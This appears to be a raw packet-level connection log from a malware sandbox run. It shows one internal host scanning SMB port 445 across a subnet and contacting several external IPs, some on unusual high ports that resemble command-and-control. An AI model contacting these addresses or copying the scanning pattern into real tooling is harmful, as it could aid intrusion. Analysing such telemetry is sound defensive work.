                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:50.899072886 CEST4985580192.168.11.3018.64.172.225
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.027369976 CEST804985518.64.172.225192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.027606964 CEST4985580192.168.11.3018.64.172.225
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.029612064 CEST4985580192.168.11.3018.64.172.225
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.081727982 CEST4985480192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.157974958 CEST804985518.64.172.225192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.158106089 CEST804985518.64.172.225192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.158221960 CEST804985518.64.172.225192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.158490896 CEST4985580192.168.11.3018.64.172.225
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.162462950 CEST4985580192.168.11.3018.64.172.225
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.164804935 CEST4985680192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.292757988 CEST8049856104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.293109894 CEST4985680192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.295389891 CEST8049854162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.296087027 CEST4985680192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.423764944 CEST8049856104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.456424952 CEST8049856104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.457005978 CEST8049856104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.457159996 CEST4985680192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.463599920 CEST4985680192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.487900019 CEST49852445192.168.11.30192.168.11.5
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:51.800342083 CEST4985480192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.015794992 CEST8049854162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.472345114 CEST49857445192.168.11.30192.168.11.6
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.473179102 CEST4985831946192.168.11.30212.75.9.215
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.475081921 CEST4985980192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.518887043 CEST4985480192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.603892088 CEST8049859172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.604681969 CEST4985980192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.607188940 CEST4985980192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.735127926 CEST8049854162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.735986948 CEST8049859172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.748456001 CEST8049859172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.748544931 CEST8049859172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.748769999 CEST4985980192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:52.756284952 CEST4985980192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:53.237521887 CEST4985480192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:53.451261044 CEST8049854162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:53.471812963 CEST49857445192.168.11.30192.168.11.6
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:53.487457037 CEST4985831946192.168.11.30212.75.9.215
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:54.911619902 CEST4986180192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.040353060 CEST8049861104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.040518999 CEST4986180192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.045187950 CEST4986180192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.172940016 CEST8049861104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.210267067 CEST8049861104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.210788965 CEST8049861104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.210913897 CEST4986180192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.224811077 CEST4986180192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.486978054 CEST49857445192.168.11.30192.168.11.6
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:55.502607107 CEST4985831946192.168.11.30212.75.9.215
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.241789103 CEST4986280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.370059013 CEST8049862104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.370381117 CEST4986280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.372972012 CEST4986280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.486964941 CEST49863445192.168.11.30192.168.11.7
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.501229048 CEST8049862104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.539766073 CEST8049862104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.540019035 CEST8049862104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.540651083 CEST4986280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:56.546777010 CEST4986280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:57.502129078 CEST49863445192.168.11.30192.168.11.7
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:58.688746929 CEST4986531946192.168.11.30212.75.9.215
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:59.501657963 CEST49863445192.168.11.30192.168.11.7
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:59.689119101 CEST4986531946192.168.11.30212.75.9.215
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:59.848292112 CEST4986780192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:59.978533030 CEST8049867172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:59.979017973 CEST4986780192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:39:59.981961966 CEST4986780192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:00.110265970 CEST8049867172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:00.122845888 CEST8049867172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:00.123739958 CEST8049867172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:00.123881102 CEST4986780192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:00.132066011 CEST4986780192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:00.501735926 CEST49868445192.168.11.30192.168.11.8
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:01.516844988 CEST49868445192.168.11.30192.168.11.8
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:01.704269886 CEST4986531946192.168.11.30212.75.9.215
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.175843954 CEST4987180192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.304214001 CEST8049871172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.304546118 CEST4987180192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.307537079 CEST4987180192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.436366081 CEST8049871172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.478085995 CEST8049871172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.478125095 CEST8049871172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.478250980 CEST4987180192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.490298033 CEST4987180192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:03.532015085 CEST49868445192.168.11.30192.168.11.8
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:04.516371965 CEST49872445192.168.11.30192.168.11.9
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:04.879949093 CEST4987418849192.168.11.3046.159.134.7
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.515908957 CEST49872445192.168.11.30192.168.11.9
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.644555092 CEST4987580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.773147106 CEST8049875104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.773294926 CEST4987580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.776717901 CEST4987580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.890805006 CEST4987418849192.168.11.3046.159.134.7
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.905503988 CEST8049875104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.927970886 CEST8049875104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.928766012 CEST8049875104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.929225922 CEST4987580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:05.940365076 CEST4987580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:07.531025887 CEST49872445192.168.11.30192.168.11.9
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:07.890552044 CEST4987418849192.168.11.3046.159.134.7
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:07.973294973 CEST4987780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.101823092 CEST8049877104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.102085114 CEST4987780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.105302095 CEST4987780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.233725071 CEST8049877104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.246814966 CEST8049877104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.246869087 CEST8049877104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.246922970 CEST8049877104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.246948957 CEST8049877104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.247088909 CEST8049877104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.247126102 CEST4987780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.247288942 CEST4987780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.247288942 CEST4987780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.257025003 CEST4987780192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:08.531095028 CEST49878445192.168.11.30192.168.11.10
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:09.546248913 CEST49878445192.168.11.30192.168.11.10
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.409095049 CEST4988080192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.537431955 CEST8049880172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.537872076 CEST4988080192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.541316986 CEST4988080192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.678776979 CEST8049880172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.686429024 CEST8049880172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.686764002 CEST8049880172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.687194109 CEST4988080192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:10.702792883 CEST4988080192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:11.083128929 CEST4988144785192.168.11.30188.114.42.197
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:11.545799971 CEST49878445192.168.11.30192.168.11.10
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:11.722256899 CEST4988280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:11.850775003 CEST8049882104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:11.850940943 CEST4988280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:11.856653929 CEST4988280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:11.985117912 CEST8049882104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:12.037065029 CEST8049882104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:12.037245035 CEST8049882104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:12.037432909 CEST4988280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:12.050602913 CEST4988280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:12.092513084 CEST4988144785192.168.11.30188.114.42.197
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:12.545773983 CEST49883445192.168.11.30192.168.11.11
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:13.560956955 CEST49883445192.168.11.30192.168.11.11
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.107706070 CEST4988144785192.168.11.30188.114.42.197
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.220544100 CEST4988580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.348931074 CEST8049885104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.349093914 CEST4988580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.352721930 CEST4988580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.480750084 CEST8049885104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.494254112 CEST4988680192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.497003078 CEST8049885104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.497329950 CEST8049885104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.497426033 CEST4988580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.512298107 CEST4988580192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:14.695991993 CEST8049886162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.201173067 CEST4988680192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.403404951 CEST8049886162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.517148972 CEST4988780192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.576096058 CEST49883445192.168.11.30192.168.11.11
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.645517111 CEST8049887104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.646542072 CEST4988780192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.648714066 CEST4988780192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.776463032 CEST8049887104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.792668104 CEST8049887104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.793620110 CEST8049887104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.793844938 CEST4988780192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.806284904 CEST4988780192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:15.904851913 CEST4988680192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:16.108640909 CEST8049886162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:16.560482025 CEST49888445192.168.11.30192.168.11.12
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:16.622711897 CEST4988680192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:16.824466944 CEST8049886162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:16.920020103 CEST4988980192.168.11.3018.64.172.225
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.049652100 CEST804988918.64.172.225192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.049854040 CEST4988980192.168.11.3018.64.172.225
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.054218054 CEST4988980192.168.11.3018.64.172.225
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.182813883 CEST804988918.64.172.225192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.182926893 CEST804988918.64.172.225192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.182940006 CEST804988918.64.172.225192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.183166027 CEST4988980192.168.11.3018.64.172.225
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.191081047 CEST4988980192.168.11.3018.64.172.225
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.290194035 CEST4989140089192.168.11.3089.215.35.152
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.325751066 CEST4988680192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.528079987 CEST8049886162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:17.575743914 CEST49888445192.168.11.30192.168.11.12
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.203552008 CEST4989280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.294254065 CEST4989140089192.168.11.3089.215.35.152
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.332952976 CEST8049892104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.333220959 CEST4989280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.336213112 CEST4989280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.465338945 CEST8049892104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.490449905 CEST8049892104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.490473032 CEST8049892104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.490634918 CEST4989280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:18.502999067 CEST4989280192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.051841974 CEST4989380192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.252926111 CEST8049893162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.516144991 CEST4989480192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.590832949 CEST49888445192.168.11.30192.168.11.12
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.644665003 CEST8049894172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.644859076 CEST4989480192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.648307085 CEST4989480192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.762655020 CEST4989380192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.776325941 CEST8049894172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.797949076 CEST8049894172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.798610926 CEST8049894172.67.155.175192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.798794985 CEST4989480192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.813745975 CEST4989480192.168.11.30172.67.155.175
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:19.963759899 CEST8049893162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:20.309434891 CEST4989140089192.168.11.3089.215.35.152
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:20.465607882 CEST4989380192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:20.575269938 CEST49895445192.168.11.30192.168.11.13
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:20.669492960 CEST8049893162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:20.834758997 CEST4989680192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:20.963268995 CEST8049896104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:20.963516951 CEST4989680192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:20.967335939 CEST4989680192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.095997095 CEST8049896104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.108386040 CEST8049896104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.108458996 CEST8049896104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.108761072 CEST8049896104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.109030962 CEST4989680192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.109281063 CEST8049896104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.109302044 CEST8049896104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.109450102 CEST4989680192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.119318008 CEST4989680192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.184201956 CEST4989380192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.385927916 CEST8049893162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.590353966 CEST49895445192.168.11.30192.168.11.13
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:21.887203932 CEST4989380192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.089360952 CEST8049893162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.126523972 CEST4989780192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.255402088 CEST8049897104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.255614996 CEST4989780192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.258682966 CEST4989780192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.390142918 CEST8049897104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.404212952 CEST8049897104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.405960083 CEST8049897104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.406157017 CEST4989780192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:22.419636011 CEST4989780192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.485656023 CEST4989833325192.168.11.3041.47.39.184
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:23.589951038 CEST49895445192.168.11.30192.168.11.13
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.495939970 CEST4989833325192.168.11.3041.47.39.184
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.590101004 CEST49900445192.168.11.30192.168.11.14
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.610225916 CEST4990180192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.738631010 CEST8049901104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.738809109 CEST4990180192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.741761923 CEST4990180192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.870161057 CEST8049901104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.893861055 CEST8049901104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.893959999 CEST8049901104.27.207.92192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.894182920 CEST4990180192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:24.905704975 CEST4990180192.168.11.30104.27.207.92
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:25.605117083 CEST49900445192.168.11.30192.168.11.14
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:25.695162058 CEST4990280192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:25.897883892 CEST8049902162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:26.401757002 CEST4990280192.168.11.30162.249.65.164
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:26.511075020 CEST4989833325192.168.11.3041.47.39.184
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:26.603148937 CEST8049902162.249.65.164192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:26.936161041 CEST4990480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.064369917 CEST8049904104.19.223.79192.168.11.30
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.064604044 CEST4990480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.067579031 CEST4990480192.168.11.30104.19.223.79
                                                                                                                                                                                                                                                    Oct 15, 2024 15:40:27.104789019 CEST4990280192.168.11.30162.249.65.164
